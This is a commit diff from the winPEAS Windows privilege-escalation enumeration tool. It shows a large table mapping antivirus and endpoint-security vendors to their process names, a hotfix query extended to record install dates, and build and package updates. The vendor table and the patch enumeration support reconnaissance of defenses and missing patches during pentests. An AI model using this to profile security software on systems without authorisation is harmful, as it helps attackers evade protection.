{ "IObit Malware Fighter 6", new HashSet<string>() { "iwsimf_av.exe", "imfantivirususb.exe", "feedback.exe", "sendbugreportnew.exe", "ransomware.exe", "imfantivirustips.exe", "imfdbupdatestat.exe", "imf_actioncenterdownloader.exe", "iwsimf.exe", "browserprotect.exe", "driverscan.exe", "imfregister.exe", "reprocess.exe", "liveupdate.exe", "christmas.exe", "bf.exe", "imf_downconfig.exe", "browsercleaner.exe", "antitracking.exe", "bluebirdinit.exe", "imftips.exe", "imfinstaller.exe", "locallang.exe", "carescan.exe", "imfsrvwsc.exe", "safebox.exe", "aupdate.exe", "iobitliveupdate.exe", "imfchecker.exe", "iwsimfxp.exe", "ppuninstaller.exe", "imfantivirusfix.exe", "imfbigupgrade.exe", "exclusivepsimf.exe", "imfanalyzer.exe", "bfimf.exe", "imfsrv.exe", "autoupdate.exe", "spinit.exe", "homepage.exe", "dugtrio.exe", } },
{ "IObit Security 360", new HashSet<string>() { "is360tray.exe", "is360init.exe", "is360srv.exe", "e_privacysweeper.exe", "a_hijackscan.exe", "g_portable.exe", "d_powerfuldelete.exe", "b_securityholes.exe", "is360updater.exe", "unins000.exe", "f_pctuneup.exe", "imf_freesoftwaredownloader.exe", "c_passivedefense.exe", } },
{ "K7AntiVirus Plus by K7 Computing Pvt Ltd", new HashSet<string>() { "healthmon.exe", "k7avqrnt.exe", "k7tliehistory.exe", "k7tlusbvaccine.exe", "k7tsalrt.exe", "k7tlwintemp.exe", "k7tlinettemp.exe", "k7tshlpr.exe", "k7disinfectorgui.exe", "k7tlvirtkey.exe", "k7tlmtry.exe", "k7fwsrvc.exe", "k7tsecurity.exe", "k7avmscn.exe", "k7ctscan.exe", "k7tsecurityuninstall.exe", "k7rtscan.exe", "k7avscan.exe", "k7crvsvc.exe", "k7tsdbg.exe", "k7emlpxy.exe", } },
{ "K7AntiVirus Premium by K7 Computing Pvt Ltd", new HashSet<string>() { "k7quervarcleaningtool.exe", "k7ndfhlpr.exe", "healthmon.exe", "k7avqrnt.exe", "k7tliehistory.exe", "k7tlusbvaccine.exe", "k7tsstart.exe", "k7tsalrt.exe", "k7tlwintemp.exe", "k7mebezatencremovaltool.exe", "k7tlinettemp.exe", "k7tsmain.exe", "k7tshlpr.exe", "k7tssplh.exe", "k7disinfectorgui.exe", "k7tlvirtkey.exe", "k7tlmtry.exe", "k7fwsrvc.exe", "k7tsreminder.exe", "k7tsecurity.exe", "k7avmscn.exe", "k7ctscan.exe", "k7rtscan.exe", "k7tsnews.exe", "k7avscan.exe", "k7crvsvc.exe", "k7emlpxy.exe", "k7tsupdt.exe", } },
{ "Kaspersky Anti-Ransomware Tool for Business", new HashSet<string>() { "anti_ransom_gui.exe", "dump_writer_agent.exe", "anti_ransom.exe", } },
{ "Kaspersky Anti-Virus 2011", new HashSet<string>() { "kldw.exe", } },
{ "Kaspersky Anti-Virus 2013", new HashSet<string>() { "ffcert.exe", } },
{ "Kaspersky Anti-Virus Personal", new HashSet<string>() { "kavsend.exe", "kavsvc.exe", "getsysteminfo.exe", "uninstall.exe", } },
{ "Kaspersky Antivirus", new HashSet<string>() { "avp.exe", } },
{ "Kaspersky", new HashSet<string>() { "klnagent.exe", } },
{ "Malwarebytes", new HashSet<string>() { "mbam.exe", "mbar.exe", "mbae.exe", } },
{ "McAfee All Access AntiVirus Plus", new HashSet<string>() { "compatibilitytester.exe", "mispreg.exe", "mcods.exe", "mcvsmap.exe", "mcocrollback.exe", "mpfalert.exe", "mcvulalert.exe", "mvsinst.exe", "mcupdmgr.exe", "mcpvtray.exe", "mcvuladmagnt.exe", "mcvulunpk.exe", "qcshm.exe", "mcoemmgr.exe", "qcconsol.exe", "mcuihost.exe", "mcvsshld.exe", "mcinstru.exe", "mcvulcon.exe", "mcsync.exe", "firesvc.exe", "qccons32.exe", "mcsvrcnt.exe", "mcvulusragnt.exe", "shrcl.exe", "mcodsscan.exe", "mcapexe.exe", "mcautoreg.exe", "mcinfo.exe", "mcvulctr.exe", "svcdrv.exe", } },
{ "McAfee AntiSpyware", new HashSet<string>() { "msssrv.exe", "mcspy.exe", "msscli.exe", } },
{ "McAfee AntiVirus Plus", new HashSet<string>() { "mispreg.exe", "mcvsmap.exe", "mcods.exe", "mcactinst.exe", "mcocrollback.exe", "mpfalert.exe", "mcinsupd.exe", "langsel.exe", "mvsinst.exe", "mcshell.exe", "mfehidin.exe", "mchlp32.exe", "mcupdmgr.exe", "saupd.exe", "uninstall.exe", "mcawfwk.exe", "qcshm.exe", "mcsacore.exe", "mcoemmgr.exe", "qcconsol.exe", "mcuihost.exe", "mcinstru.exe", "mcvsshld.exe", "mcoobeof.exe", "mcsync.exe", "firesvc.exe", "qccons32.exe", "saui.exe", "mcsvrcnt.exe", "shrcl.exe", "mcsmtfwk.exe", "mcautoreg.exe", "mcuninst.exe", "mcinfo.exe", "actutil.exe", } },
{ "McAfee Antivirus", new HashSet<string>() { "mcafee.exe", } },
{ "NANO Antivirus beta by Nano Security Ltd", new HashSet<string>() { "nanoreportc64.exe", "nanorst.exe", "uninstall.exe", "nanoreport.exe", "nanosvc.exe", "nanoav64.exe", "nanoreportc.exe", } },
{ "NANO-Antivirus", new HashSet<string>() { "nanoav.exe", } },
{ "Norton Antivirus", new HashSet<string>() { "nortonsecurity.exe", } },
{ "PCMatic", new HashSet<string>() { "pcmaticpushcontroller.exe", "pcmaticrt.exe", } },
{ "Panda Security", new HashSet<string>() { "psanhost.exe", } },
{ "Panda", new HashSet<string>() { "avengine.exe", } },
{ "Quick Heal AntiVirus Pro", new HashSet<string>() { "delnboot.exe", "0000007c_afupdfny.exe", "asmain.exe", "asclsrvc.exe", "acappaa.exe", "activate.exe", } },
{ "Quick Heal Total Security", new HashSet<string>() { "delnboot.exe", "contact.exe", "activate.exe", "acappaa.exe", } },
{ "Sophos Anti-Rootkit 1.5.0", new HashSet<string>() { "helper.exe", "svrtcli.exe", "sctcleanupservice.exe", "native.exe", "svrtservice.exe", "svrtgui.exe", "sarcli.exe", "sctboottasks.exe", } },
{ "Sophos Anti-Virus", new HashSet<string>() { "sav32cli.exe", "savprogress.exe", "savservice.exe", "native.exe", "swi_di.exe", "backgroundscanclient.exe", "savmain.exe", "forceupdatealongsidesgn.exe", "swc_service.exe", "savproxy.exe", "savcleanupservice.exe", "savadminservice.exe", } },
{ "Symantec Endpoint Protection", new HashSet<string>() { "ccsvchst.exe", } },
{ "Symantec", new HashSet<string>() { "sepwscsvc64.exe", } },
{ "Total Defense Anti-Virus", new HashSet<string>() { "caoscheck.exe", "ccprovsp.exe", "caschelp.exe", "caisstutorial.exe", "ccwatcher.exe", "cawsc.exe", "ccevtmgr.exe", "ccprovep.exe", "casc.exe", "cclogconfig.exe", "ccschedulersvc.exe", "cckasubmit.exe", "ccproxysrvc.exe", "caunst.exe", } },
{ "Trend micro", new HashSet<string>() { "uiwinmgr.exe", "ntrtscan.exe", "tmntsrv.exe", "pccpfw.exe", } },
{ "VIPRE Advanced Security by ThreatTrack Security", new HashSet<string>() { "sbamtray.exe", "sbamwsc.exe", "sbamcommandlinescanner.exe", "sbamcreaterestore.exe", "sbamsvc.exe", "avcproxy.exe", "sbbd.exe", } },
{ "VIPRE Antivirus by GFI Software", new HashSet<string>() { "sbamtray.exe", "sbsetupdrivers.exe", "sbamsafemodeui.exe", "sbpimsvc.exe", "sbamwsc.exe", "sbrc.exe", "sfe.exe", "sbagentdiagnostictool.exe", "sbamcommandlinescanner.exe", "sbamsvc.exe", "sbamcreaterestore.exe", "sbamui.exe", } },
{ "ViRobot Anti-Ransomware by HAURI", new HashSet<string>() { "vrbbdsvc.exe", "uninstall.exe", "vrbbdlogviewer.exe", "vrbbdbackup.exe", "vrpuller.exe", } },
{ "ViRobot Internet Security 2011 by HAURI", new HashSet<string>() { "hvrpcuselock.exe", "hvrlogview.exe", "hvreasyrobot.exe", "hvrsetup.exe", "hvrfilewipe.exe", "hvrmalsvc.exe", "hvrtrafficviewer.exe", "hvrscan.exe", "hvrcontain.exe", "hvrquarantview.exe", "hvrtray.exe", } },
{ "Webroot", new HashSet<string>() { "wrsa.exe", } },
{ "Windows defender", new HashSet<string>() { "msmpeng.exe", "mpcmdrun.exe", "msascuil.exe", "windefend.exe", "msascui.exe", "msmpsvc.exe", } },
{ "Zillya Internet Security by ALLIT Service", new HashSet<string>() { "drvcmd.exe", "ziscore.exe", "keyboard.exe", "systemresearchtool.exe", "zis.exe", "zisnet.exe", "conscan.exe", "zisupdater.exe", "zisaux.exe", "ziships.exe", } },
{ "Zillya! Antivirus by ALLIT Service", new HashSet<string>() { "wscmgr.exe", "drvcmd.exe", "zillya.exe", "zavaux.exe", "reporter.exe", "autoruntool.exe", "taskmanagertool.exe", } },
{ "Zillya! Internet Security by ALLIT Service", new HashSet<string>() { "restoretool.exe", "drvcmd.exe", "wscmgr.exe", "zefcore.exe", "zefsvc.exe", "fwdisabler.exe", "zefaux.exe", "backuphostfile.exe", "conscanner.exe", "reporter.exe", "autoruntool.exe", "zef.exe", "taskmanagertool.exe", } },
{ "ZoneAlarm Anti-Ransomware by Check Point Software", new HashSet<string>() { "zup.exe", "consrvhost.exe", "zaarupdateservice.exe", "zaar.exe", "sbacipollasrvhost.exe", "uninst.exe", } },
{ "ZoneAlarm Antivirus by Check Point, Inc", new HashSet<string>() { "threatemulation.exe", "multiscan.exe", "restoreutility.exe", "vsmon.exe", "zatray.exe", "multifix.exe", } },
{ "ZoneAlarm by Check Point, Inc", new HashSet<string>() { "instmtdr.exe", "zatutor.exe", "cpes_clean.exe", "multiscan.exe", "zauninst.exe", "zlclient.exe", "multifix.exe", } }
};
// reverse lookup list
public static Dictionary<string, HashSet<string>> AVVendorsByProcess = new Dictionary<string, HashSet<string>>();
static DefensiveProcesses()
{
// initialize the structure here
foreach (var kvp in Definitions)
{
var vendor = kvp.Key;
foreach (var executable in kvp.Value)
{
var sanitizedExecutable = executable.Trim().ToLower();
if (!AVVendorsByProcess.ContainsKey(sanitizedExecutable))
{
AVVendorsByProcess.Add(sanitizedExecutable, new HashSet<string>() { vendor });
}
else
{
AVVendorsByProcess[sanitizedExecutable].Add(vendor);
}
}
}
}
}
}

4
winPEAS/winPEASexe/winPEAS/Info/SystemInfo/SystemInfo.cs
View File

@@ -133,7 +133,7 @@ namespace winPEAS.Info.SystemInfo
IPGlobalProperties properties = IPGlobalProperties.GetIPGlobalProperties();
string dnsDomain = properties.DomainName;
const string query = "SELECT HotFixID FROM Win32_QuickFixEngineering";
const string query = "SELECT HotFixID,InstalledOn FROM Win32_QuickFixEngineering";
using (var search = new ManagementObjectSearcher(query))
{
@@ -142,7 +142,7 @@ namespace winPEAS.Info.SystemInfo
string hotfixes = "";
foreach (ManagementObject quickFix in collection)
{
hotfixes += quickFix["HotFixID"].ToString() + ", ";
hotfixes += quickFix["HotFixID"] + " (" + quickFix["InstalledOn"] + "), ";
}
results.Add("Hostname", strHostName);

BIN
winPEAS/winPEASexe/winPEAS/costura32/SQLite.Interop.dll Normal file
View File

Binary file not shown.

BIN
winPEAS/winPEASexe/winPEAS/costura64/SQLite.Interop.dll Normal file
View File

Binary file not shown.

63
winPEAS/winPEASexe/winPEAS/packages.config
View File

@@ -1,4 +1,67 @@
<?xml version="1.0" encoding="utf-8"?>
<packages>
<package id="AlphaFS" version="2.2.6" targetFramework="net452" />
<package id="Costura.Fody" version="5.7.0" targetFramework="net48" developmentDependency="true" />
<package id="EntityFramework" version="6.4.4" targetFramework="net452" />
<package id="Fody" version="6.5.5" targetFramework="net48" developmentDependency="true" />
<package id="Microsoft.Bcl.AsyncInterfaces" version="8.0.0" targetFramework="net48" />
<package id="Microsoft.NETCore.Platforms" version="1.1.0" targetFramework="net48" />
<package id="Microsoft.Win32.Primitives" version="4.3.0" targetFramework="net48" />
<package id="NETStandard.Library" version="1.6.1" targetFramework="net48" />
<package id="Portable.BouncyCastle" version="1.9.0" targetFramework="net48" />
<package id="Stub.System.Data.SQLite.Core.NetFramework" version="1.0.119.0" targetFramework="net452" />
<package id="System.AppContext" version="4.3.0" targetFramework="net48" />
<package id="System.Buffers" version="4.5.1" targetFramework="net48" />
<package id="System.Collections" version="4.3.0" targetFramework="net48" />
<package id="System.Collections.Concurrent" version="4.3.0" targetFramework="net48" />
<package id="System.Console" version="4.3.0" targetFramework="net48" />
<package id="System.Data.SQLite" version="1.0.119.0" targetFramework="net452" />
<package id="System.Data.SQLite.Core" version="1.0.119.0" targetFramework="net452" />
<package id="System.Data.SQLite.EF6" version="1.0.119.0" targetFramework="net452" />
<package id="System.Data.SQLite.Linq" version="1.0.119.0" targetFramework="net452" />
<package id="System.Diagnostics.Debug" version="4.3.0" targetFramework="net48" />
<package id="System.Diagnostics.DiagnosticSource" version="4.3.0" targetFramework="net48" />
<package id="System.Diagnostics.Tools" version="4.3.0" targetFramework="net48" />
<package id="System.Diagnostics.Tracing" version="4.3.0" targetFramework="net48" />
<package id="System.Globalization" version="4.3.0" targetFramework="net48" />
<package id="System.Globalization.Calendars" version="4.3.0" targetFramework="net48" />
<package id="System.IO" version="4.3.0" targetFramework="net48" />
<package id="System.IO.Compression" version="4.3.0" targetFramework="net48" />
<package id="System.IO.Compression.ZipFile" version="4.3.0" targetFramework="net48" />
<package id="System.IO.FileSystem" version="4.3.0" targetFramework="net48" />
<package id="System.IO.FileSystem.Primitives" version="4.3.0" targetFramework="net48" />
<package id="System.Linq" version="4.3.0" targetFramework="net48" />
<package id="System.Linq.Expressions" version="4.3.0" targetFramework="net48" />
<package id="System.Memory" version="4.5.5" targetFramework="net48" />
<package id="System.Net.Http" version="4.3.0" targetFramework="net48" />
<package id="System.Net.Primitives" version="4.3.0" targetFramework="net48" />
<package id="System.Net.Sockets" version="4.3.0" targetFramework="net48" />
<package id="System.Numerics.Vectors" version="4.5.0" targetFramework="net48" />
<package id="System.ObjectModel" version="4.3.0" targetFramework="net48" />
<package id="System.Reflection" version="4.3.0" targetFramework="net48" />
<package id="System.Reflection.Extensions" version="4.3.0" targetFramework="net48" />
<package id="System.Reflection.Primitives" version="4.3.0" targetFramework="net48" />
<package id="System.Resources.ResourceManager" version="4.3.0" targetFramework="net48" />
<package id="System.Runtime" version="4.3.0" targetFramework="net48" />
<package id="System.Runtime.CompilerServices.Unsafe" version="6.0.0" targetFramework="net48" />
<package id="System.Runtime.Extensions" version="4.3.0" targetFramework="net48" />
<package id="System.Runtime.Handles" version="4.3.0" targetFramework="net48" />
<package id="System.Runtime.InteropServices" version="4.3.0" targetFramework="net48" />
<package id="System.Runtime.InteropServices.RuntimeInformation" version="4.3.0" targetFramework="net48" />
<package id="System.Runtime.Numerics" version="4.3.0" targetFramework="net48" />
<package id="System.Security.Cryptography.Algorithms" version="4.3.0" targetFramework="net48" />
<package id="System.Security.Cryptography.Encoding" version="4.3.0" targetFramework="net48" />
<package id="System.Security.Cryptography.Primitives" version="4.3.0" targetFramework="net48" />
<package id="System.Security.Cryptography.X509Certificates" version="4.3.0" targetFramework="net48" />
<package id="System.Text.Encoding" version="4.3.0" targetFramework="net48" />
<package id="System.Text.Encoding.Extensions" version="4.3.0" targetFramework="net48" />
<package id="System.Text.Encodings.Web" version="8.0.0" targetFramework="net48" />
<package id="System.Text.RegularExpressions" version="4.3.0" targetFramework="net48" />
<package id="System.Threading" version="4.3.0" targetFramework="net48" />
<package id="System.Threading.Tasks" version="4.3.0" targetFramework="net48" />
<package id="System.Threading.Tasks.Extensions" version="4.5.4" targetFramework="net48" />
<package id="System.Threading.Timer" version="4.3.0" targetFramework="net48" />
<package id="System.ValueTuple" version="4.5.0" targetFramework="net48" />
<package id="System.Xml.ReaderWriter" version="4.3.0" targetFramework="net48" />
<package id="System.Xml.XDocument" version="4.3.0" targetFramework="net48" />
</packages>

219
winPEAS/winPEASexe/winPEAS/winPEAS.csproj
View File

@@ -1,5 +1,7 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="..\packages\Costura.Fody.5.7.0\build\Costura.Fody.props" Condition="Exists('..\packages\Costura.Fody.5.7.0\build\Costura.Fody.props')" />
<Import Project="..\packages\EntityFramework.6.4.4\build\EntityFramework.props" Condition="Exists('..\packages\EntityFramework.6.4.4\build\EntityFramework.props')" />
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
@@ -8,7 +10,8 @@
<OutputType>Exe</OutputType>
<RootNamespace>winPEAS</RootNamespace>
<AssemblyName>winPEAS</AssemblyName>
<TargetFrameworkVersion>v4.5.2</TargetFrameworkVersion>
<TargetFrameworkVersion>v4.8</TargetFrameworkVersion>
<CopySQLiteInteropFiles>false</CopySQLiteInteropFiles>
<FileAlignment>512</FileAlignment>
<Deterministic>true</Deterministic>
<NuGetPackageImportStamp>
@@ -114,13 +117,185 @@
</StartupObject>
</PropertyGroup>
<ItemGroup>
<Reference Include="BouncyCastle.Crypto, Version=1.9.0.0, Culture=neutral, PublicKeyToken=0e99375e54769942, processorArchitecture=MSIL">
<HintPath>..\packages\Portable.BouncyCastle.1.9.0\lib\net40\BouncyCastle.Crypto.dll</HintPath>
</Reference>
<Reference Include="Costura, Version=5.7.0.0, Culture=neutral, processorArchitecture=MSIL">
<HintPath>..\packages\Costura.Fody.5.7.0\lib\netstandard1.0\Costura.dll</HintPath>
</Reference>
<Reference Include="EntityFramework, Version=6.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=MSIL">
<HintPath>..\packages\EntityFramework.6.4.4\lib\net45\EntityFramework.dll</HintPath>
</Reference>
<Reference Include="EntityFramework.SqlServer, Version=6.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=MSIL">
<HintPath>..\packages\EntityFramework.6.4.4\lib\net45\EntityFramework.SqlServer.dll</HintPath>
</Reference>
<Reference Include="Microsoft.Bcl.AsyncInterfaces, Version=8.0.0.0, Culture=neutral, PublicKeyToken=cc7b13ffcd2ddd51, processorArchitecture=MSIL">
<HintPath>..\packages\Microsoft.Bcl.AsyncInterfaces.8.0.0\lib\net462\Microsoft.Bcl.AsyncInterfaces.dll</HintPath>
</Reference>
<Reference Include="Microsoft.Win32.Primitives, Version=4.0.2.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
<HintPath>..\packages\Microsoft.Win32.Primitives.4.3.0\lib\net46\Microsoft.Win32.Primitives.dll</HintPath>
<Private>True</Private>
<Private>True</Private>
</Reference>
<Reference Include="System" />
<Reference Include="System.AppContext, Version=4.1.1.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
<HintPath>..\packages\System.AppContext.4.3.0\lib\net463\System.AppContext.dll</HintPath>
<Private>True</Private>
<Private>True</Private>
</Reference>
<Reference Include="System.Buffers, Version=4.0.3.0, Culture=neutral, PublicKeyToken=cc7b13ffcd2ddd51, processorArchitecture=MSIL">
<HintPath>..\packages\System.Buffers.4.5.1\lib\net461\System.Buffers.dll</HintPath>
</Reference>
<Reference Include="System.ComponentModel.Composition" />
<Reference Include="System.ComponentModel.DataAnnotations" />
<Reference Include="System.Console, Version=4.0.1.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
<HintPath>..\packages\System.Console.4.3.0\lib\net46\System.Console.dll</HintPath>
<Private>True</Private>
<Private>True</Private>
</Reference>
<Reference Include="System.Core" />
<Reference Include="System.Data.SQLite, Version=1.0.119.0, Culture=neutral, PublicKeyToken=db937bc2d44ff139, processorArchitecture=MSIL">
<HintPath>..\packages\Stub.System.Data.SQLite.Core.NetFramework.1.0.119.0\lib\net451\System.Data.SQLite.dll</HintPath>
</Reference>
<Reference Include="System.Data.SQLite.EF6, Version=1.0.119.0, Culture=neutral, PublicKeyToken=db937bc2d44ff139, processorArchitecture=MSIL">
<HintPath>..\packages\System.Data.SQLite.EF6.1.0.119.0\lib\net451\System.Data.SQLite.EF6.dll</HintPath>
</Reference>
<Reference Include="System.Data.SQLite.Linq, Version=1.0.119.0, Culture=neutral, PublicKeyToken=db937bc2d44ff139, processorArchitecture=MSIL">
<HintPath>..\packages\System.Data.SQLite.Linq.1.0.119.0\lib\net451\System.Data.SQLite.Linq.dll</HintPath>
</Reference>
<Reference Include="System.Diagnostics.DiagnosticSource, Version=4.0.1.0, Culture=neutral, PublicKeyToken=cc7b13ffcd2ddd51, processorArchitecture=MSIL">
<HintPath>..\packages\System.Diagnostics.DiagnosticSource.4.3.0\lib\net46\System.Diagnostics.DiagnosticSource.dll</HintPath>
</Reference>
<Reference Include="System.Diagnostics.Tracing, Version=4.1.1.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
<HintPath>..\packages\System.Diagnostics.Tracing.4.3.0\lib\net462\System.Diagnostics.Tracing.dll</HintPath>
<Private>True</Private>
<Private>True</Private>
</Reference>
<Reference Include="System.DirectoryServices.AccountManagement" />
<Reference Include="System.Globalization.Calendars, Version=4.0.2.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
<HintPath>..\packages\System.Globalization.Calendars.4.3.0\lib\net46\System.Globalization.Calendars.dll</HintPath>
<Private>True</Private>
<Private>True</Private>
</Reference>
<Reference Include="System.IO, Version=4.1.1.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
<HintPath>..\packages\System.IO.4.3.0\lib\net462\System.IO.dll</HintPath>
<Private>True</Private>
<Private>True</Private>
</Reference>
<Reference Include="System.IO.Compression, Version=4.1.2.0, Culture=neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=MSIL">
<HintPath>..\packages\System.IO.Compression.4.3.0\lib\net46\System.IO.Compression.dll</HintPath>
<Private>True</Private>
<Private>True</Private>
</Reference>
<Reference Include="System.IO.Compression.FileSystem" />
<Reference Include="System.IO.Compression.ZipFile, Version=4.0.2.0, Culture=neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=MSIL">
<HintPath>..\packages\System.IO.Compression.ZipFile.4.3.0\lib\net46\System.IO.Compression.ZipFile.dll</HintPath>
<Private>True</Private>
<Private>True</Private>
</Reference>
<Reference Include="System.IO.FileSystem, Version=4.0.2.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
<HintPath>..\packages\System.IO.FileSystem.4.3.0\lib\net46\System.IO.FileSystem.dll</HintPath>
<Private>True</Private>
<Private>True</Private>
</Reference>
<Reference Include="System.IO.FileSystem.Primitives, Version=4.0.2.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
<HintPath>..\packages\System.IO.FileSystem.Primitives.4.3.0\lib\net46\System.IO.FileSystem.Primitives.dll</HintPath>
<Private>True</Private>
<Private>True</Private>
</Reference>
<Reference Include="System.Linq, Version=4.1.1.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
<HintPath>..\packages\System.Linq.4.3.0\lib\net463\System.Linq.dll</HintPath>
<Private>True</Private>
<Private>True</Private>
</Reference>
<Reference Include="System.Linq.Expressions, Version=4.1.1.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
<HintPath>..\packages\System.Linq.Expressions.4.3.0\lib\net463\System.Linq.Expressions.dll</HintPath>
<Private>True</Private>
<Private>True</Private>
</Reference>
<Reference Include="System.Management" />
<Reference Include="System.Memory, Version=4.0.1.2, Culture=neutral, PublicKeyToken=cc7b13ffcd2ddd51, processorArchitecture=MSIL">
<HintPath>..\packages\System.Memory.4.5.5\lib\net461\System.Memory.dll</HintPath>
</Reference>
<Reference Include="System.Net.Http, Version=4.1.1.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
<HintPath>..\packages\System.Net.Http.4.3.0\lib\net46\System.Net.Http.dll</HintPath>
<Private>True</Private>
<Private>True</Private>
</Reference>
<Reference Include="System.Net.Sockets, Version=4.1.1.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
<HintPath>..\packages\System.Net.Sockets.4.3.0\lib\net46\System.Net.Sockets.dll</HintPath>
<Private>True</Private>
<Private>True</Private>
</Reference>
<Reference Include="System.Numerics" />
<Reference Include="System.Numerics.Vectors, Version=4.1.4.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
<HintPath>..\packages\System.Numerics.Vectors.4.5.0\lib\net46\System.Numerics.Vectors.dll</HintPath>
</Reference>
<Reference Include="System.Reflection, Version=4.1.1.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
<HintPath>..\packages\System.Reflection.4.3.0\lib\net462\System.Reflection.dll</HintPath>
<Private>True</Private>
<Private>True</Private>
</Reference>
<Reference Include="System.Runtime, Version=4.1.1.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
<HintPath>..\packages\System.Runtime.4.3.0\lib\net462\System.Runtime.dll</HintPath>
<Private>True</Private>
<Private>True</Private>
</Reference>
<Reference Include="System.Runtime.CompilerServices.Unsafe, Version=6.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
<HintPath>..\packages\System.Runtime.CompilerServices.Unsafe.6.0.0\lib\net461\System.Runtime.CompilerServices.Unsafe.dll</HintPath>
</Reference>
<Reference Include="System.Runtime.Extensions, Version=4.1.1.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
<HintPath>..\packages\System.Runtime.Extensions.4.3.0\lib\net462\System.Runtime.Extensions.dll</HintPath>
<Private>True</Private>
<Private>True</Private>
</Reference>
<Reference Include="System.Runtime.InteropServices, Version=4.1.1.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
<HintPath>..\packages\System.Runtime.InteropServices.4.3.0\lib\net463\System.Runtime.InteropServices.dll</HintPath>
<Private>True</Private>
<Private>True</Private>
</Reference>
<Reference Include="System.Runtime.InteropServices.RuntimeInformation, Version=4.0.1.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
<HintPath>..\packages\System.Runtime.InteropServices.RuntimeInformation.4.3.0\lib\net45\System.Runtime.InteropServices.RuntimeInformation.dll</HintPath>
<Private>True</Private>
<Private>True</Private>
</Reference>
<Reference Include="System.Security" />
<Reference Include="System.Security.Cryptography.Algorithms, Version=4.2.1.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
<HintPath>..\packages\System.Security.Cryptography.Algorithms.4.3.0\lib\net463\System.Security.Cryptography.Algorithms.dll</HintPath>
<Private>True</Private>
<Private>True</Private>
</Reference>
<Reference Include="System.Security.Cryptography.Encoding, Version=4.0.1.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
<HintPath>..\packages\System.Security.Cryptography.Encoding.4.3.0\lib\net46\System.Security.Cryptography.Encoding.dll</HintPath>
<Private>True</Private>
<Private>True</Private>
</Reference>
<Reference Include="System.Security.Cryptography.Primitives, Version=4.0.1.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
<HintPath>..\packages\System.Security.Cryptography.Primitives.4.3.0\lib\net46\System.Security.Cryptography.Primitives.dll</HintPath>
<Private>True</Private>
<Private>True</Private>
</Reference>
<Reference Include="System.Security.Cryptography.X509Certificates, Version=4.1.1.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
<HintPath>..\packages\System.Security.Cryptography.X509Certificates.4.3.0\lib\net461\System.Security.Cryptography.X509Certificates.dll</HintPath>
<Private>True</Private>
<Private>True</Private>
</Reference>
<Reference Include="System.ServiceProcess" />
<Reference Include="System.Text.Encodings.Web, Version=8.0.0.0, Culture=neutral, PublicKeyToken=cc7b13ffcd2ddd51, processorArchitecture=MSIL">
<HintPath>..\packages\System.Text.Encodings.Web.8.0.0\lib\net462\System.Text.Encodings.Web.dll</HintPath>
</Reference>
<Reference Include="System.Text.RegularExpressions, Version=4.1.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
<HintPath>..\packages\System.Text.RegularExpressions.4.3.0\lib\net463\System.Text.RegularExpressions.dll</HintPath>
<Private>True</Private>
<Private>True</Private>
</Reference>
<Reference Include="System.Threading.Tasks.Extensions, Version=4.2.0.1, Culture=neutral, PublicKeyToken=cc7b13ffcd2ddd51, processorArchitecture=MSIL">
<HintPath>..\packages\System.Threading.Tasks.Extensions.4.5.4\lib\net461\System.Threading.Tasks.Extensions.dll</HintPath>
</Reference>
<Reference Include="System.Transactions" />
<Reference Include="System.ValueTuple, Version=4.0.3.0, Culture=neutral, PublicKeyToken=cc7b13ffcd2ddd51, processorArchitecture=MSIL">
<HintPath>..\packages\System.ValueTuple.4.5.0\lib\net47\System.ValueTuple.dll</HintPath>
</Reference>
<Reference Include="System.Web.Extensions" />
<Reference Include="System.Windows.Forms" />
<Reference Include="System.Xml.Linq" />
@@ -128,6 +303,11 @@
<Reference Include="Microsoft.CSharp" />
<Reference Include="System.Data" />
<Reference Include="System.Xml" />
<Reference Include="System.Xml.ReaderWriter, Version=4.1.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
